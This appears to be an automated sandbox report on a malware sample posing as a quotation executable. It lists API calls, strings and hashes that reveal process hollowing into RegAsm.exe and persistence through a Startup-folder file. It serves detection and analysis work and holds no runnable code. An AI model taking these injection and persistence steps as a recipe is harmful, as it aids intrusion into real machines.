Function 06B4246F, Relevance: 1.7, APIs: 1, Instructions: 156networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 06B43178

Memory Dump Source

Source File: 00000001.00000002.507485801.0000000006B40000.00000040.00000001.sdmp, Offset: 06B40000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 2eb2c470e7feed0a99ea8b9e4dfa16ca709c4bf42ef27eda23e8dd1caceddf65
Instruction ID: f2e01096ef7acac0757520bcd34bdddf9a58ff45a4465451e4eceb3bd7338cc9
Opcode Fuzzy Hash: 2eb2c470e7feed0a99ea8b9e4dfa16ca709c4bf42ef27eda23e8dd1caceddf65
Instruction Fuzzy Hash: 276175B1D043589FDB10DFAAC8817DEBBB1FF49304F1881AAE804AB251DB75A845DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0172FB98, Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0172FD0A

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2fcdde16230ca3af6836fea319dddce1400a62b6eee8b8a580c5317e336121b7
Instruction ID: dc555c13098193474bcf0487cd4389c23159d787f878e5c2dd62f7c2c67493da
Opcode Fuzzy Hash: 2fcdde16230ca3af6836fea319dddce1400a62b6eee8b8a580c5317e336121b7
Instruction Fuzzy Hash: 9D5100B1C04249AFDF15CFA9C890ADEBFB1FF48304F24816AE818AB221D7759985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B42495, Relevance: 1.6, APIs: 1, Instructions: 144networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 06B43178

Memory Dump Source

Source File: 00000001.00000002.507485801.0000000006B40000.00000040.00000001.sdmp, Offset: 06B40000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: ee80dc5a993aaeb0b7e51983c951cf50da3d817131c576192d5e2090bf9869b2
Instruction ID: 888a9f605eb1324c7201c2fa0dcefdec7c9f098fc7ce1c565c894c2092dbbf26
Opcode Fuzzy Hash: ee80dc5a993aaeb0b7e51983c951cf50da3d817131c576192d5e2090bf9869b2
Instruction Fuzzy Hash: 105135B1D042189FDB50DFAAC885BDEBBF1FF48304F18816AE814A7250DB71A946DF91

Uniqueness

Uniqueness Score: -1.00%

Function 06B43044, Relevance: 1.6, APIs: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 06B43178

Memory Dump Source

Source File: 00000001.00000002.507485801.0000000006B40000.00000040.00000001.sdmp, Offset: 06B40000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: d504b0bc93ca0630dcd3151ac52e03a7e44b61afbf397e2286d0d2463f1621fc
Instruction ID: bf9f0b8e110d8ed940c30e730f819699be81a71e12e94b50123309d582b1cd01
Opcode Fuzzy Hash: d504b0bc93ca0630dcd3151ac52e03a7e44b61afbf397e2286d0d2463f1621fc
Instruction Fuzzy Hash: 9B5125B1D002189FDB50DFAAC885BDEBBF1FF49304F18816AE814A7250DB71A946DF91

Uniqueness

Uniqueness Score: -1.00%

Function 06B4249C, Relevance: 1.6, APIs: 1, Instructions: 140networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 06B43178

Memory Dump Source

Source File: 00000001.00000002.507485801.0000000006B40000.00000040.00000001.sdmp, Offset: 06B40000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 91e52b2227b483c33bbf8b607640f4006dfef42a44812135b26af64fdad9399f
Instruction ID: 900bce0ba42fe50d852458def112af03fac2e557343702b32608df02fd268b67
Opcode Fuzzy Hash: 91e52b2227b483c33bbf8b607640f4006dfef42a44812135b26af64fdad9399f
Instruction Fuzzy Hash: C55114B1D002199FDB50DFAAC885BDEBBF1FF48304F14816AE814A7250DB71A945DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0172FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0172FD0A

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b75b28c299bee3d63347ad39a51be9a9d4237a160e95c7c58e71841a9ef2364b
Instruction ID: fae9c26971815a4ceb3c89f41e45b43853e9a1a5355e8ba37ee45ff6f6f29c40
Opcode Fuzzy Hash: b75b28c299bee3d63347ad39a51be9a9d4237a160e95c7c58e71841a9ef2364b
Instruction Fuzzy Hash: 9341AFB1D003199FDB14CF9AD894ADEFBB5FF88314F24812AE819AB210D7749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0172BCF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0172BD87

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1592a3ec3c3f85ebd050eadca5ead0b4debdf06073d4c5b70ccb02420ac1e736
Instruction ID: e7fb4c3522c8ef1b94b560d51c22c9849bcefcec4bb780c57a283284e8105882
Opcode Fuzzy Hash: 1592a3ec3c3f85ebd050eadca5ead0b4debdf06073d4c5b70ccb02420ac1e736
Instruction Fuzzy Hash: CB21E5B59002489FDB10CFA9D584AEEFBF4EB48314F14841AE954B3310D378A955CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0172BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0172BD87

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d79f6ce38dc0ea4d60b0cbd65665fd5ed85d4de195632dfcb43364d55d8987fc
Instruction ID: c2661f09702e21f64c8b1eb883b26e321b20d432e34fd28dca5e4bbdfae724f7
Opcode Fuzzy Hash: d79f6ce38dc0ea4d60b0cbd65665fd5ed85d4de195632dfcb43364d55d8987fc
Instruction Fuzzy Hash: DF21C2B59002589FDB10CFAAD884AEEFBF4EB48314F14841AE958A3310D378A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01728768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,017296A9,00000800,00000000,00000000), ref: 017298BA

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a144f8124a59b61de55c994d20464c686d7e67061a263ac146642b4b432decca
Instruction ID: d1bcbc950e1b4a0b3f219168475b55e5409647a2b8abea59d7775500dc854f3c
Opcode Fuzzy Hash: a144f8124a59b61de55c994d20464c686d7e67061a263ac146642b4b432decca
Instruction Fuzzy Hash: 921106B5904219DFDB10CF9AC444BDEFBF4EB48314F14842AD915A7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01729849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,017296A9,00000800,00000000,00000000), ref: 017298BA

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f72212ab73fc1a287c4321043045e3312b71c88368cb4a20d1cc84e8fbe424cf
Instruction ID: 80164a5159d6a5879517dc53265905e20494be0b5859cd0bcfa5b8652ef954ae
Opcode Fuzzy Hash: f72212ab73fc1a287c4321043045e3312b71c88368cb4a20d1cc84e8fbe424cf
Instruction Fuzzy Hash: 571114B6D002199FDB10CF9AD844BDEFBF4EB88314F14842AD955B7600C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017295C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0172962E

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b0e3cfb22f03544cd83e8d4646f37fcac8d8554727f4bf1d7afeac5ce1c11993
Instruction ID: 9f928beb5a502a704c72bf44ffd7c3e616e6ed678806a39998876423f3f69271
Opcode Fuzzy Hash: b0e3cfb22f03544cd83e8d4646f37fcac8d8554727f4bf1d7afeac5ce1c11993
Instruction Fuzzy Hash: 1A1110B5C002598FDB20CF9AC444BDEFBF4EB88318F14842AD929B7600C374A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0172FE38, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0172FE9D

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 2a7969e8e65ba9f058eb6d4085309197b60859777f1b2acb5ff40bd735ec77b9
Instruction ID: 3c845fb30def96f10fe60b1dded8cf37e514675428bad77a865c593ac06f534f
Opcode Fuzzy Hash: 2a7969e8e65ba9f058eb6d4085309197b60859777f1b2acb5ff40bd735ec77b9
Instruction Fuzzy Hash: FB11F2B58002489FDB10CF9AD885BDEFBF8EB48724F10841AE958B3201D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0172FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0172FE9D

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 8bf49db702d9e1d493f9dd7d6978658c2d8330949d48ea2caaa64dcfdcbf71c0
Instruction ID: 6fd5417a66b090e6686fd05ca3d7276cd28f5200f7359e0e760500b3eb2c0284
Opcode Fuzzy Hash: 8bf49db702d9e1d493f9dd7d6978658c2d8330949d48ea2caaa64dcfdcbf71c0
Instruction Fuzzy Hash: 981112B58002488FDB10CF9AD485BDEFBF8EB88324F20841AD958A3301C374A945CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0140D4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.497106264.000000000140D000.00000040.00000001.sdmp, Offset: 0140D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0015b6397b86cee45df8603efa1fa7d20875b75d68aec4bc8c251c8d27c531c2
Instruction ID: 26f4f47da9cf7e11ab3f791906999d593594dc805044ff1a6136befdff11f948
Opcode Fuzzy Hash: 0015b6397b86cee45df8603efa1fa7d20875b75d68aec4bc8c251c8d27c531c2
Instruction Fuzzy Hash: 4621C771904240DFDB16DF94D8C0B27BB65FB84318F24C57AED094A266C336D85AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0141D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.497186403.000000000141D000.00000040.00000001.sdmp, Offset: 0141D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2990ca6e9a3117710dcbcd3fce6735f460dfdca635224484d8cdc3eadd0f3d0a
Instruction ID: 36bbe7f5dc5d7e08784f75c737ba1563a54ba3d24728022ff46fc6e25ab498c8
Opcode Fuzzy Hash: 2990ca6e9a3117710dcbcd3fce6735f460dfdca635224484d8cdc3eadd0f3d0a
Instruction Fuzzy Hash: 7B21D3F5A04240DFDB15CF54D8C8B26BFA5EB84358F20C56AD9494B35AC33AD847CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0141D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.497186403.000000000141D000.00000040.00000001.sdmp, Offset: 0141D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f10bb96d7a8ab1b93bfe23c55df45323ccbd1ad97356136bd004c3d23ebdfbbc
Instruction ID: 60bfe2615fff51e672f5ea722d45e8fe9a74f12d9b6241c538f67d8213b7b289
Opcode Fuzzy Hash: f10bb96d7a8ab1b93bfe23c55df45323ccbd1ad97356136bd004c3d23ebdfbbc
Instruction Fuzzy Hash: 8A21C2B55083808FCB03CF24D494712BF71EB46214F28C1DBC8498B267C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0140D49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.497106264.000000000140D000.00000040.00000001.sdmp, Offset: 0140D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7837a9dd5fdde13b3ff8a029cff47b254554028ed20e2604041f793adf6edba
Instruction ID: 9defc70793e7e315c62e7b445980eda9505636ea5e77f96694e9e0a03c3da43a
Opcode Fuzzy Hash: a7837a9dd5fdde13b3ff8a029cff47b254554028ed20e2604041f793adf6edba
Instruction Fuzzy Hash: 1F11AF76904280CFDB16CF54D5C4B16BF61FB84324F24C6AADD090B667C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Quotation ATB-PR28500KINH.exe PID: 6248 Parent PID: 7036 Quotation ATB-PR28500KINH.exeCOMMON

Executed Functions

Function 05861D7F, Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 209filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 05861C2B: NtQueryInformationProcess.NTDLL(000000FF,00000000,?,00000018,00000000), ref: 05861C6F
Part of subcall function 05861C2B: NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 05861CFF
Part of subcall function 05861C2B: NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 05861D3B

NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 05861F6A
NtCreateFile.NTDLL(?,00120116,?,?,00000000,00000080,00000000,00000005,00000040,00000000,00000000), ref: 05862015
NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 05862048

Strings

\??\, xrefs: 05861E7D, 05861E80
en, xrefs: 05861FA4
en, xrefs: 05861EFC
wcsl, xrefs: 05861EF5
wcsl, xrefs: 05861F9D
\??\, xrefs: 05861E8E, 05861E94
\??\, xrefs: 05862059
%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe, xrefs: 05861E14, 05861E17

Memory Dump Source

Source File: 00000002.00000002.514948549.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID: File$Open$AllocateCreateInformationMemoryProcessQueryVirtualWrite
String ID: %appdata%\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe$\??\$\??\$\??\$en$en$wcsl$wcsl
API String ID: 2302177389-3011451884
Opcode ID: 4c2eb43af622bb57117c5c74932a5e8d34e257fcc8bc93f0bc25276c3d265d2d
Instruction ID: 0639babdd08f90531bf4f3894d1cf7c4101710d8e391456132440c435483ab15
Opcode Fuzzy Hash: 4c2eb43af622bb57117c5c74932a5e8d34e257fcc8bc93f0bc25276c3d265d2d
Instruction Fuzzy Hash: C091D3B2D002599FDB21DFA4DC85BDEBBB8BF09700F10419AE519EB251DB309A84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 05881C09, Relevance: 15.2, APIs: 10, Instructions: 225nativethreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 05881CB7
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 05881CDC
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 05881CF6
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 05881D41
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05881D66
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05881DA9
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 05881E36
NtGetContextThread.NTDLL(?,?), ref: 05881E50
NtSetContextThread.NTDLL(?,00010007), ref: 05881E74
NtResumeThread.NTDLL(?,00000000), ref: 05881E86

Memory Dump Source

Source File: 00000002.00000002.514980063.0000000005880000.00000040.00000001.sdmp, Offset: 05880000, based on PE: false

Similarity

API ID: SectionThread$ContextCreateMemoryProcessViewVirtual$InformationQueryReadResumeWrite
String ID:
API String ID: 3307612235-0
Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction ID: 7fa743d802dc85b8c0846b1490542645751ef1ec879868a14848377fa6721c76
Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction Fuzzy Hash: 1A91D371900249AFDF21DFA5CC89EEEBBB9FF49705F004059FA09EA150D731AA95CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05861C2B, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124nativefilememoryCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(000000FF,00000000,?,00000018,00000000), ref: 05861C6F
NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 05861CFF
NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 05861D3B
NtReadFile.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 05861D64

Strings

\??\, xrefs: 05861C4F, 05861C52
en\??\, xrefs: 05861D73
wcsl, xrefs: 05861CA5

Memory Dump Source

Source File: 00000002.00000002.514948549.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID: File$AllocateInformationMemoryOpenProcessQueryReadVirtual
String ID: \??\$en\??\$wcsl
API String ID: 3123795954-2781163289
Opcode ID: 9d196668dd853f8673e4fedca3662eaa64dbbfc4a189e147512ad2b14dd7e208
Instruction ID: f4c57f04edbce2d0ef56a9b4ac946e2e57d3f25c0247d6171bd94eb2cef771fe
Opcode Fuzzy Hash: 9d196668dd853f8673e4fedca3662eaa64dbbfc4a189e147512ad2b14dd7e208
Instruction Fuzzy Hash: EC41B3B290025CAFDB20CFD4DC85EEEBBBCEF08310F14415AEA19E6250D7749A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 058800AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 05880199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 058801B8

Strings

@, xrefs: 0588018C
NtOpenSection, xrefs: 0588011D, 05880120
NtMapViewOfSectionNtOpenSection, xrefs: 05880128, 0588012B
en, xrefs: 05880150
wcsl, xrefs: 05880149

Memory Dump Source

Source File: 00000002.00000002.514980063.0000000005880000.00000040.00000001.sdmp, Offset: 05880000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: 48b052d4ab15e19efb7c402816db392ba6de2ba777f331abc4a6b58145db803c
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: 193138B1D00258EFCB11DFD4C885AEEBBB8FF08754F20415AE514EB250E774AA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 058600AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 05860199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 058601B8

Strings

wcsl, xrefs: 05860149
en, xrefs: 05860150
NtOpenSection, xrefs: 0586011D, 05860120
@, xrefs: 0586018C
NtMapViewOfSectionNtOpenSection, xrefs: 05860128, 0586012B

Memory Dump Source

Source File: 00000002.00000002.514948549.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: 4eee0735071233c217af68e960a491c576137a7644e76325ad15e57edb6be99f
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: 483112B1E0025CEBCB10DFE4C885ADEBBB8FF08754F20415AE515EB250E7749A05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05861C09, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL(00000000,?), ref: 05861C21

Memory Dump Source

Source File: 00000002.00000002.514948549.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 1c3e7cc53eb4e206c5cba6e74b2dcb3e774dbaf350b88908093e0f35f565dd1b
Instruction ID: 54ae84ab8464f00150991caf0ffcecb62ef18a85d1082eaa954023622b1a722c
Opcode Fuzzy Hash: 1c3e7cc53eb4e206c5cba6e74b2dcb3e774dbaf350b88908093e0f35f565dd1b
Instruction Fuzzy Hash: 7CD0C9B595020DBED714DBA0CC47BEEBAACEB45644F008566A502E6190E6B0A6409AB4

Uniqueness

Uniqueness Score: -1.00%

Function 016177B0, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,?,016192A0,00000040,00003000), ref: 01619368

Strings

4#, xrefs: 01619304

Memory Dump Source

Source File: 00000002.00000002.498544371.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: 4#
API String ID: 4275171209-4252767769
Opcode ID: a3d0b8e9ad9c3eecf987e960668bfacc2e51382c1425f7f33d8927c16596b604
Instruction ID: c3a11f864feafce04f63459eb026edac10fb7c356e56bfb817ff1342120cfa8f
Opcode Fuzzy Hash: a3d0b8e9ad9c3eecf987e960668bfacc2e51382c1425f7f33d8927c16596b604
Instruction Fuzzy Hash: 2B1134759042089FCB10DF9AC884BDEFBF8EB88324F148419E559A7250C375A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 016192FB, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,?,016192A0,00000040,00003000), ref: 01619368

Strings

4#, xrefs: 01619304

Memory Dump Source

Source File: 00000002.00000002.498544371.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: 4#
API String ID: 4275171209-4252767769
Opcode ID: 64aa2176a3f350f4d4654e6669f7cebafe6a84765ead316bd46880ca990cb571
Instruction ID: ba750a5b138cda080400cb623dbfa48ca7ce8cbd7225689eced4703aa6879b2f
Opcode Fuzzy Hash: 64aa2176a3f350f4d4654e6669f7cebafe6a84765ead316bd46880ca990cb571
Instruction Fuzzy Hash: 2B1132B59002089FCB10DF9AC884BDEBBF8EB88324F148419E518A7310C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015CD0EC, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.498394448.00000000015CD000.00000040.00000001.sdmp, Offset: 015CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ee7a4755fd2a59db4be87b2a2311c372560d7c4b7062ba780c4d7490767ea7
Instruction ID: 3ca18916ad77f35c08888726a107b16dc71ddefe11ef16ff06a6fce24b84ade3
Opcode Fuzzy Hash: 68ee7a4755fd2a59db4be87b2a2311c372560d7c4b7062ba780c4d7490767ea7
Instruction Fuzzy Hash: 1521C1B5504240AFDB05DF94D8C0B26BBB5FBC4614F24C97DD9098F246C33AD846CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 015CD0E7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.498394448.00000000015CD000.00000040.00000001.sdmp, Offset: 015CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de44a1355ff5dd3688b85d85d30840e22fc529beda2c002cefc06c108532763f
Instruction ID: f810b7cb6ab0666f9e2886848cbdf8fb37749b39126fd670f77f1367b3a72c5d
Opcode Fuzzy Hash: de44a1355ff5dd3688b85d85d30840e22fc529beda2c002cefc06c108532763f
Instruction Fuzzy Hash: 7511BB75504280DFDB02CF94D9C0B19BFB1FB84624F28C6ADD8098F656C33AD44ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 015BD041, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.498338849.00000000015BD000.00000040.00000001.sdmp, Offset: 015BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 234d5374f46c4fd53127bee8518333cfba714bd5a7da5f217214383570a14e79
Instruction ID: 42bc754650a61dd3332944b29cd5e5aa05cc7570172cb1e2e30d2020ab60290a
Opcode Fuzzy Hash: 234d5374f46c4fd53127bee8518333cfba714bd5a7da5f217214383570a14e79
Instruction Fuzzy Hash: 7D01F77110C3489AE7204B69CCC47AAFBF8FF412A8F08C51AEE445F247E3799845C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 015BD040, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.498338849.00000000015BD000.00000040.00000001.sdmp, Offset: 015BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2aa03cab6a92b1bf4a32d766f4d7daa5df04d6aa2503122916725b5d5012605
Instruction ID: 70e26e27de79a8b87a06db39c898fd81128b6fea28d20d1ce26551e675b209d5
Opcode Fuzzy Hash: a2aa03cab6a92b1bf4a32d766f4d7daa5df04d6aa2503122916725b5d5012605
Instruction Fuzzy Hash: 55F0C8715083449AE7108B19CCC4B66FFA8EB81374F18C15AED040F247D3795844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: RegAsm.exe PID: 6200 Parent PID: 1104 RegAsm.exeCOMMON

Executed Functions

Function 010B189D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 010B1A4B

Strings

;$.x, xrefs: 010B18D9
;$.x, xrefs: 010B18FF

Memory Dump Source

Source File: 00000006.00000002.269556132.00000000010B0000.00000040.00000001.sdmp, Offset: 010B0000, based on PE: false

Similarity

API ID: PathSearch
String ID: ;$.x$;$.x
API String ID: 2203818243-911475482
Opcode ID: b66b2fc8ac6e575f84bc84732ed1ced8500b2f2a18b78491a28946e1af7ebffb
Instruction ID: 84d7ecda5b029e761d5f17e8040c7bf50c19931cba2ee5f2a6ba0fc16f46dd64
Opcode Fuzzy Hash: b66b2fc8ac6e575f84bc84732ed1ced8500b2f2a18b78491a28946e1af7ebffb
Instruction Fuzzy Hash: 49712270D002198FDB24CFA9D9946DEBBF1FF48314F29816AE859AB350D734A946CF81

Uniqueness

Uniqueness Score: -1.00%

Function 010B18A8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 010B1A4B

Strings

;$.x, xrefs: 010B18D9
;$.x, xrefs: 010B18FF

Memory Dump Source

Source File: 00000006.00000002.269556132.00000000010B0000.00000040.00000001.sdmp, Offset: 010B0000, based on PE: false

Similarity

API ID: PathSearch
String ID: ;$.x$;$.x
API String ID: 2203818243-911475482
Opcode ID: 3fba3af26ee5eb83e3738dee0b004e3765b6847976cf31fda950523a257d9ca0
Instruction ID: 7adac3761a916235661c93d312a60e793d0c4313f361c94cff05b27f5eefd2e1
Opcode Fuzzy Hash: 3fba3af26ee5eb83e3738dee0b004e3765b6847976cf31fda950523a257d9ca0
Instruction Fuzzy Hash: 38712270D002198FDB24CF99D994ADEBBF1FF48314F24816AE859AB350DB34A945CF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: RegAsm.exe PID: 7160 Parent PID: 6248 RegAsm.exeCOMMON

Executed Functions

